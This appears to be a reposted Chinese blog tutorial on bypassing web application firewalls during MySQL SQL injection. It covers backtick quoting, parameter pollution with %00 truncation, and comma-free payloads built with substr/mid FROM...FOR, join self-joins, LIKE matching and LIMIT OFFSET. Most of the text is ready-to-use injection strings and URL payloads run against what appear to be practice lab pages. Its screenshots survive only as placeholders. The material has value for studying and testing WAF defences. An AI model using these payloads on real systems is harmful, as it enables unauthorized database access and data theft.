[email protected]' ; insert...">

当前位置:网站首页>SQL 注入繞過(二)

SQL 注入繞過(二)

2022-06-28 02:21:00 Aτθ

一、反引號繞過

在 mysql 可以使用 `這裏是反引號` 繞過一些 waf 攔截。字段可以加反引號或者不加,意義相同。
insert into users(username,password,email)values('test','123456','[email protected]');
insert into users(`username`,`password`,`email`)values('test','123456','[email protected]');

\N'union distinct select 1,(select version() from `users` limit 1)--+&submit=1

在這裏插入圖片描述

二、脚本語言特性繞過

1、介紹

在 php 語言中,id=1&id=2 後面的值會自動覆蓋前面的值,不同的語言有不同的特性。可以利用這點繞過一些 waf 的攔截。
id=1%00&id=2 union select 1,2,3
有些 waf 會去匹配第一個 id 參數1%00%00 是截斷字符,waf 會自動截斷 從而不會檢測後面的內容。到了程序中,id 就等於 id=2 union select 1,2,3 從繞過注入攔截。
其他語言特性

在這裏插入圖片描述

2、實操1

在這裏插入圖片描述
在這裏插入圖片描述

3、實操2

?name=vince%00&name=' union select 1,database()--+&submit=1

在這裏插入圖片描述

三、逗號繞過

目前有些防注入脚本都會逗號進行攔截,例如常規注入中必須包含逗號。
select * from users where id=1 union select 1,2,3,4;
一般會對逗號過濾成空,select * from users where id=1 union select 1 2 3 4;這樣SQL 語句就會出錯。所以,可以不使用逗號進行 SQL 注入。
繞過方法如下:

1、第一種方式:substr 截取字符串

查詢當前庫第一個字符:
select(substr(database() from 1 for 1)); 
查詢 p 等於 select(substr(database() from 1 for 1)),頁面返回正常。
select * from users where id=1 and 'p'=(select(substr(database() from 1 for 1)));
可以進一步優化 m 換成 hex 0x6D,這樣就避免了單引號。
select * from users where id=1 and 0x70=(select(substr(database() from 1 for 1)));

在這裏插入圖片描述

?name=vince' and (select(substr(database() from 1 for 1)))='p'--+&submit=1 ?name=vince' and (select(substr(database() from 1 for 1)))='x'--+&submit=1

在這裏插入圖片描述
在這裏插入圖片描述

2、第二種方式:mid 截取字符串

這個 min 函數跟 substr 函數功能相同,如果 substr 函數被攔截或者過濾可以使用這個函數代替。
select (mid(database() from 1 for 1)); 
select * from users where id=1 and 'p'=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x70=(select(mid(database() from 1 for 1)));

在這裏插入圖片描述

3、第三種方式: 使用 join 繞過

使用 join 自連接兩個錶:
union select 1,2 #等價於 union select * from (select 1)a join (select 2)b,其中a 和 b 分別是錶的別名。
select * from users where id=-1 union select 1,2,3,4;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select 3)c join(select 4)d;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select user())c join(select 4)d;
這裏也沒有使用逗號,從而繞過 waf 對逗號的攔截。

在這裏插入圖片描述

4、第四種方式:like 繞過

使用 like 模糊查詢 select user() like '%r%'; 模糊查詢成功返回 1,否則返回 0
找到第一個字符後繼續進行下一個字符匹配。從而找到所有的字符串,最後就是要查詢的內容,這種 SQL 注入語句也不會存在逗號。從而繞過 waf 攔截。

在這裏插入圖片描述

5、第五種方式:limit offset 繞過

SQL 注入時,如果需要限定條目可以使用 limit 0,1 限定返回條目的數目,limit 0,1 返回條一條記錄。如果對逗號進行攔截時,可以使用 limit 1 默認返回第一條數據。也可以使用 limit 1 offset 0 從零開始返回第一條記錄,這樣就繞過 waf 攔截。

在這裏插入圖片描述

原网站

版权声明
本文为[Aτθ]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/179/202206280016469916.html

边栏推荐

猜你喜欢

随机推荐